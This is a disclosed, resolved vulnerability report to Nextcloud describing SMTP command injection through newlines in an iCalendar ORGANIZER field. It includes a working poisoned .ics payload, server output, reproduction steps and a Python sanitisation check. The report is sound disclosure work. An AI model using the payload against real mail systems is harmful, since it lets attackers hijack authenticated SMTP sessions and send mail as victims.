SMTP Command Injection in iCalendar Attachments to Emails via Newlines

Disclosed: 2022-07-04 13:10:26 By spaceraccoon To nextcloud
Medium
Vulnerability Details
Note: This is similar to {1509216}, but has a new source/attack vector. Apologies for not picking this up earlier.

## Summary:

When users receive iCalendar attachments in Mail, there is an option to add it to their calendar:

██████████

Once they add it to the calendar, a PUT request is sent:

```
PUT /remote.php/dav/calendars/nextcloud/personal/██████.ics HTTP/2
Host: 192.168.92.132

BEGIN:VCALENDAR
PRODID:-//Nextcloud Mail
BEGIN:VTIMEZONE
TZID:Asia/Singapore
BEGIN:STANDARD
TZOFFSETFROM:+0800
TZOFFSETTO:+0800
TZNAME:+08
DTSTART:19700101T000000
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
CREATED:20220319T044448Z
DTSTAMP:20220319T080250Z
LAST-MODIFIED:20220319T080250Z
SEQUENCE:2
UID:a027641d-9f3a-4570-8cff-aa5cde0ba323
DTSTART;TZID=Asia/Singapore:20220322T100000
DTEND;TZID=Asia/Singapore:20220322T110000
STATUS:CONFIRMED
SUMMARY:Normal Event
ATTENDEE;CN=nextcloud;CUTYPE=INDIVIDUAL;PARTSTAT=DECLINED;ROLE=REQ-PARTICIP
 ANT;RSVP=TRUE;LANGUAGE=en:mailto:███
ORGANIZER;CN=Normal User:mailto:<ORGANIZER EMAIL>
END:VEVENT
END:VCALENDAR
```

At the same time, a pipelined SMTP command sequence is sent to the email server to notify `<ORGANIZER EMAIL>` that the user has accepted the event. Unfortunately, since `<ORGANIZER EMAIL>` is not sanitized, if an attacker sends a poisoned iCalendar file with newlines in the `ORGANIZER` property, those newlines end up inside the pipelined SMTP commands, allowing the attacker to inject arbitrary SMTP commands. Which commands are available varies with the backend email server (Gmail, Outlook, local SMTP server) and so the impact differs too, such as changing the `MAIL FROM` user, running sensitive commands like `QUEU` to view the current view, and so on. SMTP errors are returned in the response, making this a non-blind injection.

For example, an attacker can inject a simple `EHLO a` command:

```
BEGIN:VCALENDAR
CALSCALE:GREGORIAN
VERSION:2.0
PRODID:-//Nextcloud Mail
BEGIN:VEVENT
CREATED:20220319T044448Z
DTSTAMP:20220319T080250Z
LAST-MODIFIED:20220319T080250Z
SEQUENCE:2
UID:a027641d-9f3a-4570-8cff-aa5cde0ba323
DTSTART;TZID=Asia/Singapore:20220322T100000
DTEND;TZID=Asia/Singapore:20220322T110000
STATUS:CONFIRMED
SUMMARY:Normal Event
ATTENDEE;CN=nextcloud;CUTYPE=INDIVIDUAL;PARTSTAT=DECLINED;ROLE=REQ-PARTICIP
 ANT;RSVP=TRUE;LANGUAGE=en:mailto:████
ORGANIZER;CN=Normal User:mailto:test(\nEHLO a\n)@gmail.com
END:VEVENT
BEGIN:VTIMEZONE
TZID:Asia/Singapore
BEGIN:STANDARD
TZOFFSETFROM:+0800
TZOFFSETTO:+0800
TZNAME:+08
DTSTART:19700101T000000
END:STANDARD
END:VTIMEZONE
END:VCALENDAR
```

Which for Gmail would return:

```
{"status":"error","message":"Could not send mail: Expected response code 354 but got code \"250\", with message \"250-smtp.gmail.com at your service, [116.89.6.224]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-AUTH LOGIN PLAIN XOAUTH2 PLAIN-CLIENTTOKEN OAUTHBEARER XOAUTH\r\n250-ENHANCEDSTATUSCODES\r\n250-PIPELINING\r\n250-CHUNKING\r\n250 SMTPUTF8\r\n\"","data":{"type":"OCA\\Calendar\\Exception\\ServiceException","message":"Could not send mail: Expected response code 354 but got code \"250\", with message \"250-smtp.gmail.com at your service, [116.89.6.224]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-AUTH LOGIN PLAIN XOAUTH2 PLAIN-CLIENTTOKEN OAUTHBEARER XOAUTH\r\n250-ENHANCEDSTATUSCODES\r\n250-PIPELINING\r\n250-CHUNKING\r\n250 SMTPUTF8\r\n\"","code":250,
```

Note that for this report, the commands are blind, but they can be used remotely by changing the sender/recipient. I added additional logging to `/var/www/nextcloud/3rdparty/swiftmailer/swiftmailer/lib/classes/Swift/Transport/AbstractSmtpTransport.php` to confirm that the commands were injected.

## Steps To Reproduce:

Note: Email sending should be set up in the admin settings.

Set up `/var/www/nextcloud/3rdparty/swiftmailer/swiftmailer/lib/classes/Swift/Transport/AbstractSmtpTransport.php` to log SMTP commands. I inserted the following at line 343: `file_put_contents('/tmp/test.log',$response,FILE_APPEND);` (under `$response = $this->getFullResponse($seq);`). I also inserted the following at line 327: `file_put_contents('/tmp/test.log',$command,FILE_APPEND);` (below `$failures = (array) $failures;`).

1. From an external email account, send the victim's Nextcloud email address the attachment ███████. Modify `█████` in the file to the victim's email.
2. As the victim, check email in Nextcloud. Click the 3 dots beside `event.ics` > Import into Calendar > Personal. This triggers the PUT request.
3. Check `/tmp/test.log`. Confirm that the newlines and the arbitrary `EHLO a` SMTP command have been injected and sent to the server.

## Impact

The impact varies based on which commands are supported by the backend SMTP server. However, the main risk is that the attacker can hijack an already-authenticated SMTP session and run arbitrary SMTP commands as the email user, such as sending emails to other users, changing the FROM user, and so on. As before, this depends on the configuration of the server itself, but newlines should be sanitized to mitigate such arbitrary SMTP command injection.
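The check the report asks for, as an added example (not Nextcloud's or Swift Mailer's code): extract the `ORGANIZER` mailto address, show how a newline inside it splits one pipelined SMTP command into several lines, and reject such addresses before they reach the transport. It assumes the application decodes the iCalendar `\n` escape into a real newline, as the injected `EHLO a` in the report implies.

```python
import re

# Constructed samples: the ORGANIZER line from the report's payload and a
# benign one. The "\n" escapes are decoded to newlines below (assumption:
# the parser did the same, which is what let "EHLO a" reach the server).
POISONED_ORGANIZER = "ORGANIZER;CN=Normal User:mailto:test(\\nEHLO a\\n)@gmail.com"
CLEAN_ORGANIZER = "ORGANIZER;CN=Normal User:mailto:organizer@example.com"

_CTRL = re.compile(r"[\x00-\x1f\x7f]")          # CR, LF and other controls
_ADDR = re.compile(r"[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}")


def organizer_address(line: str) -> str:
    """Return the mailto target of an ORGANIZER property line, with the
    iCalendar text escapes \\n / \\N decoded to a real newline."""
    _, _, value = line.partition(":mailto:")
    return value.replace("\\n", "\n").replace("\\N", "\n")


def smtp_command_lines(addr: str) -> list[str]:
    """Lines the SMTP server would see if the address were interpolated
    into a RCPT TO command unsanitised. A single-element list is safe;
    every extra element is a command the attacker chose."""
    return re.split(r"\r?\n", f"RCPT TO:<{addr}>")


def safe_address(addr: str) -> str:
    """Hardened path: refuse anything that can end an SMTP command line
    and require a plain mailbox address before handing it to the mailer."""
    if _CTRL.search(addr):
        raise ValueError("control character in organizer address")
    if not _ADDR.fullmatch(addr):
        raise ValueError("organizer is not a plain mailbox address")
    return addr


if __name__ == "__main__":
    for line in (POISONED_ORGANIZER, CLEAN_ORGANIZER):
        addr = organizer_address(line)
        print("would send:", smtp_command_lines(addr))
        try:
            print("accepted:", safe_address(addr))
        except ValueError as exc:
            print("rejected:", exc)
```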
Report Stats
  • Report ID: 1516377
  • State: Closed
  • Substate: resolved
  • Upvotes: 20